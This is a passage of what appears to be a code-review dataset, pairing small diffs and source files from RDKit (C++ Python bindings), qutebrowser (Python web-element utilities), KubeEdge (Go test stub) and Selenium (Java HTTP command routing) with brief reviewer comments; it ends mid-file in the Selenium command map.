.def("IsInRingSize", AtomIsInRingSize,
"Returns whether or not the atom is in a ring of a particular "
"size.\n\n"
" ARGUMENTS:\n"
" - size: the ring size to look for\n")
.def("IsInRing", AtomIsInRing,
"Returns whether or not the atom is in a ring\n\n")
.def("HasQuery", &Atom::hasQuery,
"Returns whether or not the atom has an associated query\n\n")
.def("DescribeQuery", describeQuery,
"returns a text description of the query. Primarily intended for "
"debugging purposes.\n\n")
.def("GetSmarts", AtomGetSmarts,
"returns the SMARTS (or SMILES) string for an Atom\n\n")
// properties
.def("SetProp", AtomSetProp<std::string>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a string).\n"
" - value: the property value (a string).\n\n")
.def("GetProp", GetProp<Atom, std::string>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a string).\n\n"
" RETURNS: a string\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetIntProp", AtomSetProp<int>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a int).\n"
" - value: the property value (a int).\n\n")
.def("SetUnsignedProp", AtomSetProp<unsigned>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (an unsigned integer).\n"
" - value: the property value (a int >= 0).\n\n")
.def("GetIntProp", GetProp<Atom, int>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (an int).\n\n"
" RETURNS: an int\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("GetUnsignedProp", GetProp<Atom, unsigned>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (an unsigned integer).\n\n"
" RETURNS: an integer (Python has no unsigned type)\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetDoubleProp", AtomSetProp<double>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a double).\n"
" - value: the property value (a double).\n\n")
.def("GetDoubleProp", GetProp<Atom, double>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a double).\n\n"
" RETURNS: a double\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetBoolProp", AtomSetProp<bool>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a bool).\n"
" - value: the property value (a bool).\n\n")
.def("GetBoolProp", GetProp<Atom, bool>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a bool).\n\n"
" RETURNS: a bool\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("HasProp", AtomHasProp,
"Queries a Atom to see if a particular property has been "
"assigned.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to check for (a string).\n")
.def("ClearProp", AtomClearProp,
"Removes a particular property from an Atom (does nothing if not "
"already set).\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be removed.\n")
.def("GetPropNames", &Atom::getPropList, (python::arg("self")),
"Returns a list of the properties set on the Atom.\n\n")
.def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self")),
"Returns a dictionary of the properties set on the Atom.\n"
" n.b. some properties cannot be converted to python types.\n")
.def("UpdatePropertyCache", &Atom::updatePropertyCache,
(python::arg("self"), python::arg("strict") = true),
"Regenerates computed properties like implicit valence and ring "
"information.\n\n")
.def("NeedsUpdatePropertyCache", &Atom::needsUpdatePropertyCache,
(python::arg("self")),
"Returns true or false depending on whether implicit and explicit "
"valence of the molecule have already been calculated.\n\n")
.def("GetMonomerInfo", AtomGetMonomerInfo,
python::return_internal_reference<
1, python::with_custodian_and_ward_postcall<0, 1> >(),
"Returns the atom's MonomerInfo object, if there is one.\n\n")
.def("GetPDBResidueInfo", AtomGetPDBResidueInfo,
python::return_internal_reference<
1, python::with_custodian_and_ward_postcall<0, 1> >(),
"Returns the atom's MonomerInfo object, if there is one.\n\n")
.def("SetMonomerInfo", SetAtomMonomerInfo,
"Sets the atom's MonomerInfo object.\n\n");
python::enum_<Atom::HybridizationType>("HybridizationType")
.value("UNSPECIFIED", Atom::UNSPECIFIED)
.value("SP", Atom::SP)
.value("SP2", Atom::SP2)
.value("SP3", Atom::SP3)
.value("SP3D", Atom::SP3D)
.value("SP3D2", Atom::SP3D2)
.value("OTHER", Atom::OTHER);
python::enum_<Atom::ChiralType>("ChiralType")
.value("CHI_UNSPECIFIED", Atom::CHI_UNSPECIFIED)
.value("CHI_TETRAHEDRAL_CW", Atom::CHI_TETRAHEDRAL_CW)
.value("CHI_TETRAHEDRAL_CCW", Atom::CHI_TETRAHEDRAL_CCW)
.value("CHI_OTHER", Atom::CHI_OTHER)
.export_values();
;
python::enum_<Queries::CompositeQueryType>("CompositeQueryType")
.value("COMPOSITE_AND", Queries::COMPOSITE_AND)
.value("COMPOSITE_OR", Queries::COMPOSITE_OR)
.value("COMPOSITE_XOR", Queries::COMPOSITE_XOR)
.export_values();
;
atomClassDoc =
"The class to store QueryAtoms.\n\
These cannot currently be constructed directly from Python\n";
python::class_<QueryAtom, python::bases<Atom> >(
"QueryAtom", atomClassDoc.c_str(), python::no_init)
.def("ExpandQuery", expandQuery,
(python::arg("self"), python::arg("other"),
python::arg("how") = Queries::COMPOSITE_AND,
python::arg("maintainOrder") = true),
"combines the query from other with ours");
};
};
} // end of namespace
void wrap_atom() { RDKit::atom_wrapper::wrap(); }
| 1 | 15,048 | n.b. private and computed values are now exposed to the API. They were hidden/not exposed before. | rdkit-rdkit | cpp |
@@ -285,6 +285,13 @@ class WebElementWrapper(collections.abc.MutableMapping):
tag = self._elem.tagName().lower()
return self.get('role', None) in roles or tag in ('input', 'textarea')
+ def remove_target(self):
+ """Remove target from link"""
+ if self._elem.tagName().lower() == 'a':
+ self._elem.removeAttribute('target')
+ elif self.parent().tagName().lower() == 'a':
+ self.parent().removeAttribute('target')
+
def debug_text(self):
"""Get a text based on an element suitable for debug output."""
self._check_vanished() | 1 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2016 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Utilities related to QWebElements.
Module attributes:
Group: Enum for different kinds of groups.
SELECTORS: CSS selectors for different groups of elements.
FILTERS: A dictionary of filter functions for the modes.
The filter for "links" filters javascript:-links and a-tags
without "href".
"""
import collections.abc
import functools
from PyQt5.QtCore import QRect, QUrl
from PyQt5.QtWebKit import QWebElement
from qutebrowser.config import config
from qutebrowser.utils import log, usertypes, utils
Group = usertypes.enum('Group', ['all', 'links', 'images', 'url', 'prevnext',
'focus'])
SELECTORS = {
Group.all: ('a, area, textarea, select, input:not([type=hidden]), button, '
'frame, iframe, link, [onclick], [onmousedown], [role=link], '
'[role=option], [role=button], img'),
Group.links: 'a, area, link, [role=link]',
Group.images: 'img',
Group.url: '[src], [href]',
Group.prevnext: 'a, area, button, link, [role=button]',
Group.focus: '*:focus',
}
def filter_links(elem):
return 'href' in elem and QUrl(elem['href']).scheme() != 'javascript'
FILTERS = {
Group.links: filter_links,
Group.prevnext: filter_links,
}
class IsNullError(Exception):
"""Gets raised by WebElementWrapper if an element is null."""
pass
class WebElementWrapper(collections.abc.MutableMapping):
"""A wrapper around QWebElement to make it more intelligent."""
def __init__(self, elem):
if isinstance(elem, self.__class__):
raise TypeError("Trying to wrap a wrapper!")
if elem.isNull():
raise IsNullError('{} is a null element!'.format(elem))
self._elem = elem
for name in ('addClass', 'appendInside', 'appendOutside',
'attributeNS', 'classes', 'clone', 'document',
'encloseContentsWith', 'encloseWith',
'evaluateJavaScript', 'findAll', 'findFirst',
'firstChild', 'geometry', 'hasAttributeNS',
'hasAttributes', 'hasClass', 'hasFocus', 'lastChild',
'localName', 'namespaceUri', 'nextSibling', 'parent',
'prefix', 'prependInside', 'prependOutside',
'previousSibling', 'removeAllChildren',
'removeAttributeNS', 'removeClass', 'removeFromDocument',
'render', 'replace', 'setAttributeNS', 'setFocus',
'setInnerXml', 'setOuterXml', 'setPlainText',
'setStyleProperty', 'styleProperty', 'tagName',
'takeFromDocument', 'toInnerXml', 'toOuterXml',
'toggleClass', 'webFrame', '__eq__', '__ne__'):
# We don't wrap some methods for which we have better alternatives:
# - Mapping access for attributeNames/hasAttribute/setAttribute/
# attribute/removeAttribute.
# - isNull is checked automagically.
# - str(...) instead of toPlainText
# For the rest, we create a wrapper which checks if the element is
# null.
method = getattr(self._elem, name)
def _wrapper(meth, *args, **kwargs):
self._check_vanished()
return meth(*args, **kwargs)
wrapper = functools.partial(_wrapper, method)
# We used to do functools.update_wrapper here, but for some reason
# when using hints with many links, this accounted for nearly 50%
# of the time when profiling, which is unacceptable.
setattr(self, name, wrapper)
def __str__(self):
self._check_vanished()
return self._elem.toPlainText()
def __repr__(self):
try:
html = self.debug_text()
except IsNullError:
html = None
return utils.get_repr(self, html=html)
def __getitem__(self, key):
self._check_vanished()
if key not in self:
raise KeyError(key)
return self._elem.attribute(key)
def __setitem__(self, key, val):
self._check_vanished()
self._elem.setAttribute(key, val)
def __delitem__(self, key):
self._check_vanished()
if key not in self:
raise KeyError(key)
self._elem.removeAttribute(key)
def __contains__(self, key):
self._check_vanished()
return self._elem.hasAttribute(key)
def __iter__(self):
self._check_vanished()
yield from self._elem.attributeNames()
def __len__(self):
self._check_vanished()
return len(self._elem.attributeNames())
def _check_vanished(self):
"""Raise an exception if the element vanished (is null)."""
if self._elem.isNull():
raise IsNullError('Element {} vanished!'.format(
self._elem))
def is_visible(self, mainframe):
"""Check whether the element is currently visible on the screen.
Args:
mainframe: The main QWebFrame.
Return:
True if the element is visible, False otherwise.
"""
return is_visible(self._elem, mainframe)
def rect_on_view(self):
"""Get the geometry of the element relative to the webview."""
return rect_on_view(self._elem)
def is_writable(self):
"""Check whether an element is writable."""
self._check_vanished()
return not ('disabled' in self or 'readonly' in self)
def is_content_editable(self):
"""Check if an element has a contenteditable attribute.
Args:
elem: The QWebElement to check.
Return:
True if the element has a contenteditable attribute,
False otherwise.
"""
self._check_vanished()
try:
return self['contenteditable'].lower() not in ('false', 'inherit')
except KeyError:
return False
def _is_editable_object(self):
"""Check if an object-element is editable."""
if 'type' not in self:
log.webview.debug("<object> without type clicked...")
return False
objtype = self['type'].lower()
if objtype.startswith('application/') or 'classid' in self:
# Let's hope flash/java stuff has an application/* mimetype OR
# at least a classid attribute. Oh, and let's hope images/...
# DON'T have a classid attribute. HTML sucks.
log.webview.debug("<object type='{}'> clicked.".format(objtype))
return config.get('input', 'insert-mode-on-plugins')
else:
# Image/Audio/...
return False
def _is_editable_input(self):
"""Check if an input-element is editable.
Return:
True if the element is editable, False otherwise.
"""
try:
objtype = self['type'].lower()
except KeyError:
return self.is_writable()
else:
if objtype in ['text', 'email', 'url', 'tel', 'number', 'password',
'search']:
return self.is_writable()
else:
return False
def _is_editable_div(self):
"""Check if a div-element is editable.
Return:
True if the element is editable, False otherwise.
"""
# Beginnings of div-classes which are actually some kind of editor.
div_classes = ('CodeMirror', # Javascript editor over a textarea
'kix-', # Google Docs editor
'ace_') # http://ace.c9.io/
for klass in self._elem.classes():
if any([klass.startswith(e) for e in div_classes]):
return True
return False
def is_editable(self, strict=False):
"""Check whether we should switch to insert mode for this element.
Args:
strict: Whether to do stricter checking so only fields where we can
get the value match, for use with the :editor command.
Return:
True if we should switch to insert mode, False otherwise.
"""
# pylint: disable=too-many-return-statements
self._check_vanished()
roles = ('combobox', 'textbox')
log.misc.debug("Checking if element is editable: {}".format(
repr(self)))
tag = self._elem.tagName().lower()
if self.is_content_editable() and self.is_writable():
return True
elif self.get('role', None) in roles and self.is_writable():
return True
elif tag == 'input':
return self._is_editable_input()
elif tag == 'textarea':
return self.is_writable()
elif tag in ('embed', 'applet'):
# Flash/Java/...
return config.get('input', 'insert-mode-on-plugins') and not strict
elif tag == 'object':
return self._is_editable_object() and not strict
elif tag == 'div':
return self._is_editable_div() and not strict
else:
return False
def is_text_input(self):
"""Check if this element is some kind of text box."""
self._check_vanished()
roles = ('combobox', 'textbox')
tag = self._elem.tagName().lower()
return self.get('role', None) in roles or tag in ('input', 'textarea')
def debug_text(self):
"""Get a text based on an element suitable for debug output."""
self._check_vanished()
return utils.compact_text(self._elem.toOuterXml(), 500)
def javascript_escape(text):
"""Escape values special to javascript in strings.
With this we should be able to use something like:
elem.evaluateJavaScript("this.value='{}'".format(javascript_escape(...)))
And all values should work.
"""
# This is a list of tuples because order matters, and using OrderedDict
# makes no sense because we don't actually need dict-like properties.
replacements = (
('\\', r'\\'), # First escape all literal \ signs as \\.
("'", r"\'"), # Then escape ' and " as \' and \".
('"', r'\"'), # (note it won't hurt when we escape the wrong one).
('\n', r'\n'), # We also need to escape newlines for some reason.
('\r', r'\r'),
('\x00', r'\x00'),
('\ufeff', r'\ufeff'),
# http://stackoverflow.com/questions/2965293/
('\u2028', r'\u2028'),
('\u2029', r'\u2029'),
)
for orig, repl in replacements:
text = text.replace(orig, repl)
return text
def get_child_frames(startframe):
"""Get all children recursively of a given QWebFrame.
Loosely based on http://blog.nextgenetics.net/?e=64
Args:
startframe: The QWebFrame to start with.
Return:
A list of children QWebFrame, or an empty list.
"""
results = []
frames = [startframe]
while frames:
new_frames = []
for frame in frames:
results.append(frame)
new_frames += frame.childFrames()
frames = new_frames
return results
def focus_elem(frame):
"""Get the focused element in a web frame.
Args:
frame: The QWebFrame to search in.
"""
elem = frame.findFirstElement(SELECTORS[Group.focus])
return WebElementWrapper(elem)
def rect_on_view(elem, elem_geometry=None):
"""Get the geometry of the element relative to the webview.
We need this as a standalone function (as opposed to a WebElementWrapper
method) because we want to run is_visible before wrapping when hinting for
performance reasons.
Args:
elem: The QWebElement to get the rect for.
elem_geometry: The geometry of the element, or None.
Calling QWebElement::geometry is rather expensive so we
want to avoid doing it twice.
"""
if elem.isNull():
raise IsNullError("Got called on a null element!")
if elem_geometry is None:
elem_geometry = elem.geometry()
frame = elem.webFrame()
rect = QRect(elem_geometry)
while frame is not None:
rect.translate(frame.geometry().topLeft())
rect.translate(frame.scrollPosition() * -1)
frame = frame.parentFrame()
return rect
def is_visible(elem, mainframe):
"""Check if the given element is visible in the frame.
We need this as a standalone function (as opposed to a WebElementWrapper
method) because we want to check this before wrapping when hinting for
performance reasons.
Args:
elem: The QWebElement to check.
mainframe: The QWebFrame in which the element should be visible.
"""
if elem.isNull():
raise IsNullError("Got called on a null element!")
# CSS attributes which hide an element
hidden_attributes = {
'visibility': 'hidden',
'display': 'none',
}
for k, v in hidden_attributes.items():
if elem.styleProperty(k, QWebElement.ComputedStyle) == v:
return False
elem_geometry = elem.geometry()
if not elem_geometry.isValid() and elem_geometry.x() == 0:
# Most likely an invisible link
return False
# First check if the element is visible on screen
elem_rect = rect_on_view(elem, elem_geometry=elem_geometry)
mainframe_geometry = mainframe.geometry()
if elem_rect.isValid():
visible_on_screen = mainframe_geometry.intersects(elem_rect)
else:
# We got an invalid rectangle (width/height 0/0 probably), but this
# can still be a valid link.
visible_on_screen = mainframe_geometry.contains(
elem_rect.topLeft())
# Then check if it's visible in its frame if it's not in the main
# frame.
elem_frame = elem.webFrame()
framegeom = QRect(elem_frame.geometry())
if not framegeom.isValid():
visible_in_frame = False
elif elem_frame.parentFrame() is not None:
framegeom.moveTo(0, 0)
framegeom.translate(elem_frame.scrollPosition())
if elem_geometry.isValid():
visible_in_frame = framegeom.intersects(elem_geometry)
else:
# We got an invalid rectangle (width/height 0/0 probably), but
# this can still be a valid link.
visible_in_frame = framegeom.contains(elem_geometry.topLeft())
else:
visible_in_frame = visible_on_screen
return all([visible_on_screen, visible_in_frame])
| 1 | 14,439 | Nitpick: Please add a period after `link` :wink: | qutebrowser-qutebrowser | py |
@@ -67,5 +67,8 @@ func (hs *HandlerStub) Start() {
klog.Errorf("New upstream controller failed with error: %v", err)
return
}
- upstream.Start()
+ if err := upstream.Start(); err != nil {
+ klog.Errorf("Failed to start upstream with error: %v", err)
+ return
+ }
} | 1 | /*
Copyright 2019 The KubeEdge Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package handlerstub
import (
"k8s.io/klog"
"github.com/kubeedge/beehive/pkg/core"
"github.com/kubeedge/kubeedge/tests/stubs/common/constants"
)
// Init module
func init() {
core.Register(&HandlerStub{})
}
// HandlerStub definition
type HandlerStub struct {
podManager *PodManager
}
func (*HandlerStub) Enable() bool {
return true
}
// Return module name
func (*HandlerStub) Name() string {
return constants.HandlerStub
}
// Return module group
func (*HandlerStub) Group() string {
return constants.MetaGroup
}
// Start handler hub
func (hs *HandlerStub) Start() {
// New pod manager
pm, err := NewPodManager()
if err != nil {
klog.Errorf("Failed to create pod manager with error: %v", err)
return
}
hs.podManager = pm
// Wait for message
klog.Infof("Wait for message")
hs.WaitforMessage()
// Start upstream controller
upstream, err := NewUpstreamController(pm)
if err != nil {
klog.Errorf("New upstream controller failed with error: %v", err)
return
}
upstream.Start()
}
| 1 | 16,749 | we got no chance that `err` is not nil here, need to revisit how `NewUpstreamController` is defined. | kubeedge-kubeedge | go |
@@ -247,7 +247,8 @@ public class HttpCommandExecutor implements CommandExecutor, NeedsLocalLogs {
.put(GET_LOG, post("/session/:sessionId/log"))
.put(GET_AVAILABLE_LOG_TYPES, get("/session/:sessionId/log/types"))
- .put(STATUS, get("/status"));
+ .put(STATUS, get("/status"))
+ .put(HEAP_SNAPSHOT, get("/session/:sessionId/chromium/heap_snapshot"));
nameToUrl = builder.build();
} | 1 | /*
Copyright 2007-2011 Selenium committers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.openqa.selenium.remote;
import com.google.common.base.Throwables;
import com.google.common.collect.ImmutableMap;
import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.NoHttpResponseException;
import org.apache.http.auth.AuthScope;
import org.apache.http.auth.UsernamePasswordCredentials;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.http.client.params.HttpClientParams;
import org.apache.http.entity.ContentType;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.BasicHttpParams;
import org.apache.http.params.CoreConnectionPNames;
import org.apache.http.params.HttpParams;
import org.apache.http.protocol.BasicHttpContext;
import org.apache.http.protocol.HttpContext;
import org.apache.http.util.EntityUtils;
import org.openqa.selenium.UnsupportedCommandException;
import org.openqa.selenium.WebDriverException;
import org.openqa.selenium.logging.LocalLogs;
import org.openqa.selenium.logging.LogEntry;
import org.openqa.selenium.logging.LogType;
import org.openqa.selenium.logging.NeedsLocalLogs;
import org.openqa.selenium.logging.profiler.HttpProfilerLogEntry;
import org.openqa.selenium.remote.internal.HttpClientFactory;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.BindException;
import java.net.MalformedURLException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.nio.charset.Charset;
import java.util.Map;
import static org.apache.http.protocol.ExecutionContext.HTTP_TARGET_HOST;
import static org.openqa.selenium.remote.DriverCommand.*;
public class HttpCommandExecutor implements CommandExecutor, NeedsLocalLogs {
private static final int MAX_REDIRECTS = 10;
private final HttpHost targetHost;
private final URL remoteServer;
private final Map<String, CommandInfo> nameToUrl;
private final HttpClient client;
private final ErrorCodes errorCodes = new ErrorCodes();
private static HttpClientFactory httpClientFactory;
private LocalLogs logs = LocalLogs.getNullLogger();
public HttpCommandExecutor(URL addressOfRemoteServer) {
this(ImmutableMap.<String, CommandInfo>of(), addressOfRemoteServer);
}
public HttpCommandExecutor(Map<String, CommandInfo> additionalCommands, URL addressOfRemoteServer) {
try {
remoteServer = addressOfRemoteServer == null ?
new URL(System.getProperty("webdriver.remote.server", "http://localhost:4444/wd/hub")) :
addressOfRemoteServer;
} catch (MalformedURLException e) {
throw new WebDriverException(e);
}
HttpParams params = new BasicHttpParams();
// Use the JRE default for the socket linger timeout.
params.setParameter(CoreConnectionPNames.SO_LINGER, -1);
HttpClientParams.setRedirecting(params, false);
synchronized (HttpCommandExecutor.class) {
if (httpClientFactory == null) {
httpClientFactory = new HttpClientFactory();
}
}
client = httpClientFactory.getHttpClient();
if (addressOfRemoteServer != null && addressOfRemoteServer.getUserInfo() != null) {
// Use HTTP Basic auth
UsernamePasswordCredentials credentials = new
UsernamePasswordCredentials(addressOfRemoteServer.getUserInfo());
((DefaultHttpClient) client).getCredentialsProvider().
setCredentials(AuthScope.ANY, credentials);
}
// Some machines claim "localhost.localdomain" is the same as "localhost".
// This assumption is not always true.
String host = remoteServer.getHost().replace(".localdomain", "");
targetHost = new HttpHost(
host, remoteServer.getPort(), remoteServer.getProtocol());
ImmutableMap.Builder<String, CommandInfo> builder = ImmutableMap.builder();
for (Map.Entry<String, CommandInfo> entry : additionalCommands.entrySet()) {
builder.put(entry.getKey(), entry.getValue());
}
builder
.put(GET_ALL_SESSIONS, get("/sessions"))
.put(NEW_SESSION, post("/session"))
.put(GET_CAPABILITIES, get("/session/:sessionId"))
.put(QUIT, delete("/session/:sessionId"))
.put(GET_CURRENT_WINDOW_HANDLE, get("/session/:sessionId/window_handle"))
.put(GET_WINDOW_HANDLES, get("/session/:sessionId/window_handles"))
.put(GET, post("/session/:sessionId/url"))
// The Alert API is still experimental and should not be used.
.put(GET_ALERT, get("/session/:sessionId/alert"))
.put(DISMISS_ALERT, post("/session/:sessionId/dismiss_alert"))
.put(ACCEPT_ALERT, post("/session/:sessionId/accept_alert"))
.put(GET_ALERT_TEXT, get("/session/:sessionId/alert_text"))
.put(SET_ALERT_VALUE, post("/session/:sessionId/alert_text"))
.put(GO_FORWARD, post("/session/:sessionId/forward"))
.put(GO_BACK, post("/session/:sessionId/back"))
.put(REFRESH, post("/session/:sessionId/refresh"))
.put(EXECUTE_SCRIPT, post("/session/:sessionId/execute"))
.put(EXECUTE_ASYNC_SCRIPT, post("/session/:sessionId/execute_async"))
.put(GET_CURRENT_URL, get("/session/:sessionId/url"))
.put(GET_TITLE, get("/session/:sessionId/title"))
.put(GET_PAGE_SOURCE, get("/session/:sessionId/source"))
.put(SCREENSHOT, get("/session/:sessionId/screenshot"))
.put(SET_BROWSER_VISIBLE, post("/session/:sessionId/visible"))
.put(IS_BROWSER_VISIBLE, get("/session/:sessionId/visible"))
.put(FIND_ELEMENT, post("/session/:sessionId/element"))
.put(FIND_ELEMENTS, post("/session/:sessionId/elements"))
.put(GET_ACTIVE_ELEMENT, post("/session/:sessionId/element/active"))
.put(FIND_CHILD_ELEMENT, post("/session/:sessionId/element/:id/element"))
.put(FIND_CHILD_ELEMENTS, post("/session/:sessionId/element/:id/elements"))
.put(CLICK_ELEMENT, post("/session/:sessionId/element/:id/click"))
.put(CLEAR_ELEMENT, post("/session/:sessionId/element/:id/clear"))
.put(SUBMIT_ELEMENT, post("/session/:sessionId/element/:id/submit"))
.put(GET_ELEMENT_TEXT, get("/session/:sessionId/element/:id/text"))
.put(SEND_KEYS_TO_ELEMENT, post("/session/:sessionId/element/:id/value"))
.put(UPLOAD_FILE, post("/session/:sessionId/file"))
.put(GET_ELEMENT_VALUE, get("/session/:sessionId/element/:id/value"))
.put(GET_ELEMENT_TAG_NAME, get("/session/:sessionId/element/:id/name"))
.put(IS_ELEMENT_SELECTED, get("/session/:sessionId/element/:id/selected"))
.put(IS_ELEMENT_ENABLED, get("/session/:sessionId/element/:id/enabled"))
.put(IS_ELEMENT_DISPLAYED, get("/session/:sessionId/element/:id/displayed"))
.put(HOVER_OVER_ELEMENT, post("/session/:sessionId/element/:id/hover"))
.put(GET_ELEMENT_LOCATION, get("/session/:sessionId/element/:id/location"))
.put(GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW,
get("/session/:sessionId/element/:id/location_in_view"))
.put(GET_ELEMENT_SIZE, get("/session/:sessionId/element/:id/size"))
.put(GET_ELEMENT_ATTRIBUTE, get("/session/:sessionId/element/:id/attribute/:name"))
.put(ELEMENT_EQUALS, get("/session/:sessionId/element/:id/equals/:other"))
.put(GET_ALL_COOKIES, get("/session/:sessionId/cookie"))
.put(ADD_COOKIE, post("/session/:sessionId/cookie"))
.put(DELETE_ALL_COOKIES, delete("/session/:sessionId/cookie"))
.put(DELETE_COOKIE, delete("/session/:sessionId/cookie/:name"))
.put(SWITCH_TO_FRAME, post("/session/:sessionId/frame"))
.put(SWITCH_TO_WINDOW, post("/session/:sessionId/window"))
.put(GET_WINDOW_SIZE, get("/session/:sessionId/window/:windowHandle/size"))
.put(GET_WINDOW_POSITION, get("/session/:sessionId/window/:windowHandle/position"))
.put(SET_WINDOW_SIZE, post("/session/:sessionId/window/:windowHandle/size"))
.put(SET_WINDOW_POSITION, post("/session/:sessionId/window/:windowHandle/position"))
.put(MAXIMIZE_WINDOW, post("/session/:sessionId/window/:windowHandle/maximize"))
.put(CLOSE, delete("/session/:sessionId/window"))
.put(DRAG_ELEMENT, post("/session/:sessionId/element/:id/drag"))
.put(GET_ELEMENT_VALUE_OF_CSS_PROPERTY,
get("/session/:sessionId/element/:id/css/:propertyName"))
.put(IMPLICITLY_WAIT, post("/session/:sessionId/timeouts/implicit_wait"))
.put(SET_SCRIPT_TIMEOUT, post("/session/:sessionId/timeouts/async_script"))
.put(SET_TIMEOUT, post("/session/:sessionId/timeouts"))
.put(EXECUTE_SQL, post("/session/:sessionId/execute_sql"))
.put(GET_LOCATION, get("/session/:sessionId/location"))
.put(SET_LOCATION, post("/session/:sessionId/location"))
.put(GET_APP_CACHE_STATUS, get("/session/:sessionId/application_cache/status"))
.put(IS_BROWSER_ONLINE, get("/session/:sessionId/browser_connection"))
.put(SET_BROWSER_ONLINE, post("/session/:sessionId/browser_connection"))
// TODO (user): Would it be better to combine this command with
// GET_LOCAL_STORAGE_SIZE?
.put(GET_LOCAL_STORAGE_ITEM, get("/session/:sessionId/local_storage/key/:key"))
.put(REMOVE_LOCAL_STORAGE_ITEM, delete("/session/:sessionId/local_storage/key/:key"))
.put(GET_LOCAL_STORAGE_KEYS, get("/session/:sessionId/local_storage"))
.put(SET_LOCAL_STORAGE_ITEM, post("/session/:sessionId/local_storage"))
.put(CLEAR_LOCAL_STORAGE, delete("/session/:sessionId/local_storage"))
.put(GET_LOCAL_STORAGE_SIZE, get("/session/:sessionId/local_storage/size"))
// TODO (user): Would it be better to combine this command with
// GET_SESSION_STORAGE_SIZE?
.put(GET_SESSION_STORAGE_ITEM, get("/session/:sessionId/session_storage/key/:key"))
.put(REMOVE_SESSION_STORAGE_ITEM, delete("/session/:sessionId/session_storage/key/:key"))
.put(GET_SESSION_STORAGE_KEYS, get("/session/:sessionId/session_storage"))
.put(SET_SESSION_STORAGE_ITEM, post("/session/:sessionId/session_storage"))
.put(CLEAR_SESSION_STORAGE, delete("/session/:sessionId/session_storage"))
.put(GET_SESSION_STORAGE_SIZE, get("/session/:sessionId/session_storage/size"))
.put(GET_SCREEN_ORIENTATION, get("/session/:sessionId/orientation"))
.put(SET_SCREEN_ORIENTATION, post("/session/:sessionId/orientation"))
// Interactions-related commands.
.put(CLICK, post("/session/:sessionId/click"))
.put(DOUBLE_CLICK, post("/session/:sessionId/doubleclick"))
.put(MOUSE_DOWN, post("/session/:sessionId/buttondown"))
.put(MOUSE_UP, post("/session/:sessionId/buttonup"))
.put(MOVE_TO, post("/session/:sessionId/moveto"))
.put(SEND_KEYS_TO_ACTIVE_ELEMENT, post("/session/:sessionId/keys"))
// IME related commands.
.put(IME_GET_AVAILABLE_ENGINES, get("/session/:sessionId/ime/available_engines"))
.put(IME_GET_ACTIVE_ENGINE, get("/session/:sessionId/ime/active_engine"))
.put(IME_IS_ACTIVATED, get("/session/:sessionId/ime/activated"))
.put(IME_DEACTIVATE, post("/session/:sessionId/ime/deactivate"))
.put(IME_ACTIVATE_ENGINE, post("/session/:sessionId/ime/activate"))
// Advanced Touch API commands
// TODO(berrada): Refactor single tap with mouse click.
.put(TOUCH_SINGLE_TAP, post("/session/:sessionId/touch/click"))
.put(TOUCH_DOWN, post("/session/:sessionId/touch/down"))
.put(TOUCH_UP, post("/session/:sessionId/touch/up"))
